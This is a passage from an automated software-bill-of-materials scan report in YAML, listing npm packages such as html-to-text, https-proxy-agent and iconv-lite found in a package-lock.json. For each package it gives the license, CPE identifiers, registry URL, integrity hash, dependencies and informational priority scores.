hsl-to-hex 1.0.0' title: hsl-to-hex 1.0.0 description: 'Package discovered: hsl-to-hex 1.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 5912401178cdcd30 name: hsl-to-hex version: 1.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:hsl-to-hex:hsl-to-hex:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl-to-hex:hsl_to_hex:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl_to_hex:hsl-to-hex:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl_to_hex:hsl_to_hex:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl-to:hsl-to-hex:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl-to:hsl_to_hex:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl_to:hsl-to-hex:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl_to:hsl_to_hex:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl:hsl-to-hex:1.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl:hsl_to_hex:1.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/hsl-to-hex@1.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/hsl-to-hex/-/hsl-to-hex-1.0.0.tgz integrity: sha512-K6GVpucS5wFf44X0h2bLVRDsycgJmf9FF2elg+CrqD8GcFU8c6vYhgXn8NjUkFCwj+xDFb70qgLbTUm6sxwPmA== dependencies: hsl-to-rgb-for-reals: ^1.1.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 342f7c75e7dae76e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: hsl-to-rgb-for-reals 1.1.1' title: hsl-to-rgb-for-reals 1.1.1 description: 'Package discovered: hsl-to-rgb-for-reals 1.1.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 52590567976abaf8 name: hsl-to-rgb-for-reals version: 1.1.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:hsl-to-rgb-for-reals:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl-to-rgb-for-reals:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl_to_rgb_for_reals:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl_to_rgb_for_reals:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl-to-rgb-for:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl-to-rgb-for:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl_to_rgb_for:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl_to_rgb_for:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl-to-rgb:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl-to-rgb:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl_to_rgb:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl_to_rgb:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl-to:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl-to:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl_to:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl_to:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl:hsl-to-rgb-for-reals:1.1.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:hsl:hsl_to_rgb_for_reals:1.1.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/hsl-to-rgb-for-reals@1.1.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/hsl-to-rgb-for-reals/-/hsl-to-rgb-for-reals-1.1.1.tgz integrity: sha512-LgOWAkrN0rFaQpfdWBQlv/VhkOxb5AsBjk6NQVx4yEzWS923T07X0M1Y0VNko2H52HeSpZrZNNMJ0aFqsdVzQg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9e434aef3ca36a26 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: html-entities 2.6.0' title: html-entities 2.6.0 description: 'Package discovered: html-entities 2.6.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 4d1e475b46ee4f29 name: html-entities version: 2.6.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:html-entities:html-entities:2.6.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:html-entities:html_entities:2.6.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:html_entities:html-entities:2.6.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:html_entities:html_entities:2.6.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:html:html-entities:2.6.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:html:html_entities:2.6.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/html-entities@2.6.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/html-entities/-/html-entities-2.6.0.tgz integrity: sha512-kig+rMn/QOVRvr7c86gQ8lWXq+Hkv6CbAH1hLu+RG338StTpE8Z0b44SDVaqVu7HGKf27frdmUYEs9hTUX/cLQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 73fec784f0f7a1eb ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: html-to-text 9.0.5' title: html-to-text 9.0.5 description: 'Package discovered: html-to-text 9.0.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 41ee91a75a779a86 name: html-to-text version: 9.0.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:html-to-text:html-to-text:9.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:html-to-text:html_to_text:9.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:html_to_text:html-to-text:9.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:html_to_text:html_to_text:9.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:html-to:html-to-text:9.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:html-to:html_to_text:9.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:html_to:html-to-text:9.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:html_to:html_to_text:9.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:html:html-to-text:9.0.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:html:html_to_text:9.0.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/html-to-text@9.0.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/html-to-text/-/html-to-text-9.0.5.tgz integrity: sha512-qY60FjREgVZL03vJU6IfMV4GDjGBIoOyvuFdpBDIX9yTlDw0TjxVBQp+P8NvpdIXNJvfWBTNul7fsAQJq2FNpg== dependencies: '@selderee/plugin-htmlparser2': ^0.11.0 deepmerge: ^4.3.1 dom-serializer: ^2.0.0 htmlparser2: ^8.0.2 selderee: ^0.11.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c43d43edb7287d6e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: htmlparser2 8.0.2' title: htmlparser2 8.0.2 description: 'Package discovered: htmlparser2 8.0.2' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 4a5b4c89e570771b name: htmlparser2 version: 8.0.2 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:htmlparser2:htmlparser2:8.0.2:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/htmlparser2@8.0.2 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/htmlparser2/-/htmlparser2-8.0.2.tgz integrity: sha512-GYdjWKDkbRLkZ5geuHs5NY1puJ+PXwP7+fHPRz06Eirsb9ugf6d8kkXav6ADhcODhFFPMIXyxkxSuMf3D6NCFA== dependencies: domelementtype: ^2.3.0 domhandler: ^5.0.3 domutils: ^3.0.1 entities: ^4.4.0 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f927a519c85962f3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: http-errors 2.0.1' title: http-errors 2.0.1 description: 'Package discovered: http-errors 2.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: bf2c5c4cccddf639 name: http-errors version: 2.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:http-errors:http-errors:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http-errors:http_errors:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http_errors:http-errors:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http_errors:http_errors:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http:http-errors:2.0.1:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http:http_errors:2.0.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/http-errors@2.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/http-errors/-/http-errors-2.0.1.tgz integrity: sha512-4FbRdAX+bSdmo4AUFuS0WNiPz8NgFt+r8ThgNWmlrjQjt1Q7ZR9+zTlce2859x4KSXrwIsaeTqDoKQmtP8pLmQ== dependencies: depd: ~2.0.0 inherits: ~2.0.4 setprototypeof: ~1.2.0 statuses: ~2.0.2 toidentifier: ~1.0.1 compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: af32118f21902d1f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: http-parser-js 0.5.10' title: http-parser-js 0.5.10 description: 'Package discovered: http-parser-js 0.5.10' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b85e63dfe0c1efe8 name: http-parser-js version: 0.5.10 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:http-parser-js:http-parser-js:0.5.10:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http-parser-js:http_parser_js:0.5.10:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http_parser_js:http-parser-js:0.5.10:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http_parser_js:http_parser_js:0.5.10:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http-parser:http-parser-js:0.5.10:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http-parser:http_parser_js:0.5.10:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http_parser:http-parser-js:0.5.10:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http_parser:http_parser_js:0.5.10:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http:http-parser-js:0.5.10:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http:http_parser_js:0.5.10:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/http-parser-js@0.5.10 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/http-parser-js/-/http-parser-js-0.5.10.tgz integrity: sha512-Pysuw9XpUq5dVc/2SMHpuTY01RFl8fttgcyunjL7eEMhGM3cI4eOmiCycJDVCo/7O7ClfQD3SaI6ftDzqOXYMA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2fd1314214cea39c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: http-proxy-agent 5.0.0' title: http-proxy-agent 5.0.0 description: 'Package discovered: http-proxy-agent 5.0.0' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 91bc09c317f85f97 name: http-proxy-agent version: 5.0.0 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:http-proxy-agent:http-proxy-agent:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http-proxy-agent:http_proxy_agent:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http_proxy_agent:http-proxy-agent:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http_proxy_agent:http_proxy_agent:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http-proxy:http-proxy-agent:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http-proxy:http_proxy_agent:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http_proxy:http-proxy-agent:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http_proxy:http_proxy_agent:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http:http-proxy-agent:5.0.0:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:http:http_proxy_agent:5.0.0:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/http-proxy-agent@5.0.0 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/http-proxy-agent/-/http-proxy-agent-5.0.0.tgz integrity: sha512-n2hY8YdoRE1i7r6M0w9DIw5GgZN0G25P8zLCRQ8rjXtTU3vsNFBI/vWK/UIeE6g5MUUz6avwAPXmL6Fy9D/90w== dependencies: '@tootallnate/once': '2' agent-base: '6' debug: '4' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: d375a13b9232535f ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: https-proxy-agent 5.0.1' title: https-proxy-agent 5.0.1 description: 'Package discovered: https-proxy-agent 5.0.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: ac843d04db23cee1 name: https-proxy-agent version: 5.0.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:https-proxy-agent_project:https-proxy-agent:5.0.1:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/https-proxy-agent@5.0.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz integrity: sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA== dependencies: agent-base: '6' debug: '4' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 56bdc5dcaf0f0066 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: https-proxy-agent 7.0.6' title: https-proxy-agent 7.0.6 description: 'Package discovered: https-proxy-agent 7.0.6' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 2d10e944bb8687bf name: https-proxy-agent version: 7.0.6 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:https-proxy-agent_project:https-proxy-agent:7.0.6:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/https-proxy-agent@7.0.6 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-7.0.6.tgz integrity: sha512-vK9P5/iUfdl95AI+JVyUuIcVtd4ofvtrOr3HNtM2yxC9bnMbEdp3x01OhQNnjb8IJYi38VlTE3mBXwcfvywuSw== dependencies: agent-base: ^7.1.2 debug: '4' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: eedb1c984540056e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: hyphen 1.14.1' title: hyphen 1.14.1 description: 'Package discovered: hyphen 1.14.1' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0cfa30ecdd760351 name: hyphen version: 1.14.1 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:hyphen:hyphen:1.14.1:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/hyphen@1.14.1 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/hyphen/-/hyphen-1.14.1.tgz integrity: sha512-kvL8xYl5QMTh+LwohVN72ciOxC0OEV79IPdJSTwEXok9y9QHebXGdFgrED4sWfiax/ODx++CAMk3hMy4XPJPOw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 233f854a4d966408 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: iconv-lite 0.4.24' title: iconv-lite 0.4.24 description: 'Package discovered: iconv-lite 0.4.24' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3ce09826a837d25b name: iconv-lite version: 0.4.24 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: MIT spdxExpression: MIT type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:iconv-lite:iconv-lite:0.4.24:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:iconv-lite:iconv_lite:0.4.24:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:iconv_lite:iconv-lite:0.4.24:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:iconv_lite:iconv_lite:0.4.24:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:iconv:iconv-lite:0.4.24:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:iconv:iconv_lite:0.4.24:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/iconv-lite@0.4.24 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.4.24.tgz integrity: sha512-v3MXnZAcvnywkTUEZomIActle7RXXeedOR31wwl7VlyoXO4Qi9arvSenNQWne1TcRwhCL1HwLI21bEqdpj8/rA== dependencies: safer-buffer: '>= 2.1.2 < 3' compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: a2d6f15d605131f9 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: inherits 2.0.4' title: inherits 2.0.4 description: 'Package discovered: inherits 2.0.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 911374ff7f37ba7f name: inherits version: 2.0.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:inherits:inherits:2.0.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/inherits@2.0.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz integrity: sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 6970e7e10ca27673 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: ini 1.3.8' title: ini 1.3.8 description: 'Package discovered: ini 1.3.8' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 29aeb86d59c0f085 name: ini version: 1.3.8 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:ini_project:ini:1.3.8:*:*:*:*:node.js:*:* source: nvd-cpe-dictionary purl: pkg:npm/ini@1.3.8 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/ini/-/ini-1.3.8.tgz integrity: sha512-JV/yugV2uzW5iMRSiZAyDtQd+nxtUnjeLt0acNdw98kKLrvuRVyB80tsREOE7yvGVgalhZ6RNXCmEHkUKBKxew== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9c64ace1b439e4fe ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: internmap 2.0.3' title: internmap 2.0.3 description: 'Package discovered: internmap 2.0.3' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: da7b570ddddf2064 name: internmap version: 2.0.3 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: ISC spdxExpression: ISC type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:internmap:internmap:2.0.3:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/internmap@2.0.3 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/internmap/-/internmap-2.0.3.tgz integrity: sha512-5Hh7Y1wQbvY5ooGgPbDaL5iYLAPzMTUrjMulskHLH6wnv/A+1q5rgEaiuqEjB+oxGXIVZs1FF+R/KPN3ZSQYYg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 